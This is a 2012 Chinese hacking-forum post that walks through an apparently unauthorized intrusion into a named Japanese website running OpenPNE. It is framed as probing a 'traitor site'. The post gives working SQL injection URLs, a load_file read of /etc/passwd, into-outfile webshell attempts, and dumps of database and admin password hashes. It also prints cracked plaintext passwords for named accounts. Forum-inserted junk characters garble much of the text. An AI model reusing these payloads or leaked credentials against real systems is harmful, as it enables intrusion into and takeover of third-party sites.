找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3188|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

1 i  Z. b4 ?) d: `+ h
, u5 C6 j3 h7 r9 A$ g0x01. 检测 www.zuaa.jp 收集数据
* Z. N& F8 w, J: r% R' f; ~4 @  {" t8 o/ c2 d1 a: |

( Y+ K  E% ?& t* D# j% J, }, wwhatweb
5 p3 C' E) }9 |& j1 c. L( V+ e  F1 ?2 z8 I* v
. ^& g; q8 N3 [; f+ [* [& v+ b
利用NMAP扫描7 n8 v* j! Y* m1 U: Y6 ^

  z8 w& t. ^  H3 `/ ]中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持% g: M, x8 o/ q. u" Y! j' ]. L0 K% S5 Z7 }
0x02.找注入点
4 P& O4 C0 N; P+ z& {找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390& H% M' o; y0 N0 j
3 _% z/ K9 v5 m
' W6 r* u2 f( N8 C2 s6 ~
0x03.order by6 v7 f  S8 \& A3 V
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
9 E: n: I! m, U& n! i) \9 g
; d: E- u: R) s( E4 ?order by 28报错,order by 27正常1 Y3 r' Q) D8 e% A
3 }8 T9 B$ x, P; K
0x04.   union手动查询
1 a7 |9 V4 \: C6 M9 S8 a: S7 hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 : a3 \$ X% m# ~; c, |5 L! K4 f1 [
添加到 27 时正常显示 7 b! Z3 R& j% }$ e# \

; i' Q. y# Y1 p% M中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持* H- D$ e4 c' X6 f. Y* m. v- O- N

' G2 c& n2 ]* x7 G  M" [( j- j* k0x05. info:2 P$ `7 {# l, d. `5 j
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 3 U8 h0 Z% T+ ~/ r6 y6 {

0 g: k; q+ l. H- a5 Iuser:            root@localhost) x% j% G+ _; q% z0 j1 ^
database:    openpne8 S( a: X; `$ Y. W
version:      4.1.22
  g! l( s# e# R5 I$ k8 ?; f' Yos:             portbld-freebsd5.4% e( K. K5 z. e1 ~

' g, h* `) E3 ~4 f( ^+ t) I0x06. root用户3 e- P1 Y! ~6 p- m
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)9 p7 s' |7 y+ I, a$ _# F. H
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: ~% _  B2 V- Z$ P) q6 o! M+ z  z4 `% G
通过工具转换
7 e6 Z+ F! R* @/ }2 x
; t; }/ c7 L) ]0 S1 T# Q中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
9 @* r- e7 W; l$ M7 d8 E  }8 O* Q3 ~" ?& p( v
0x07. 利用 into outfile: L; y. V3 a; [( G- u' c; Z
全部都失败
& r8 p  |4 @: ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
( x6 P1 f+ m4 g
+ k1 Q6 Y5 ?, z+ y" {http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
4 R/ g6 z& Q% B% P1 S) k
3 Y% c% `, A5 L, I# \" o4 I; e页面显示“MDB2 Error:syntax error”
# [4 j/ ]. }9 X# Z1 N1 c/ I! r$ {8 a4 \$ O- \2 ^, W5 E
0x08. 利用 mysql 4.1
: C4 B& C* v7 C8 v' c4 E猜常规表名,字段未果 工具 sqlmap4 s7 }6 ^9 o' x/ Z4 E2 c
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
  z. a2 a3 E9 q9 D- g  z' z8 e7 ]/ b; A$ O9 Q6 q; o- t5 |

9 H2 Q4 L% c# c& C- [( g1 o9 y) D1 ^2 [9 ^
0x09. 查找后台  Y% v2 T7 D. i* @9 `' R  }& Q
利用 现有的各种 后台工具尝试都不行0 Z( O0 r, M" C$ k1 h3 y- f& ]

! x: }5 G# m2 F# Y" l0x10.  MySL外联方法
1 Q2 ?9 z: T3 R从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
* ~2 b: |+ n( H, b. w! Z可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
( z1 X% u1 Z$ \/ N8 ]  ~# shttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user& [" Q& u6 D& d
9 \" H) q8 q2 l! C6 ~
这个可以在 www.cmd5.com 解密
' g7 ]6 b; w9 I: c, }% Lroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009& Q$ p- B! d( I. L; N# r+ O' ~8 _
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
' {; g) O$ `6 M* ]# @1 M$ ropenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???* O/ l  N0 A: k$ f7 ~" \, @# M' X
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???5 i4 G" N# ~( u
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
# J0 T$ e# l" L: j
* l+ {& {. y' p& T6 t' N
8 h3 l+ }$ Q/ `9 G5 S% F0x11. 网站突破  E1 G* ]: [3 W
发现网站的源程序 openpne, google 下载 openpne 源码( K3 {1 y5 j2 G( V
7 x/ v9 E& T: H% P" H( w* j

8 l) U% @" A7 z0 E0x12. 默认信息利用
# z3 t1 }5 A; ^http://sns.zuaa.jp/?m=admin&a=page_login
% I/ U7 Z. H1 S6 Y% p
; m; y9 |" X8 s5 A& }9 D7 k表名 (c_admin_user) ,字段名(username,password)
- ~. \6 Y( x: X+ f; T" Chttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
5 h* U7 A: u- _: f2 K; a0 k6 N
& ^" P- ?3 {7 ]3 ?解密' ]6 S; P& J, N) \9 g
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
" B4 C( P$ J2 H" {! A1 mzuaajp:c0923ec5857796a393da99905008c176,          zju1897
% b0 ]0 D" u- X9 Q- i$ O. V, I4 b1 w4 h$ v7 `! U$ Q
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
- u* Z) q* i# ], E! r$ E# X2 j) M  ^6 @5 P$ x) ^; B. H
0x13. 登录后台
# g2 V. z  \3 W$ h  X! b
) S* j' O  e# p& a& a& a
9 C9 w8 O& f6 |1 m- K# ^$ r, g) Z) k8 L# c' R+ h
0x14. 小结
9 M9 R) n7 b' r; t# b4 Y利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。& o& V  |3 T3 s! z: z
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
  ~- Z. \) o3 q. r2 p) x------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain1 I$ D& x5 x. h( b; e
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
9 L( ?( P& v! ^2 V4 @3 r, {
# F  Y% c' _7 c1 ^% @; C最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!0 U' Q" q* A0 v4 ~

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表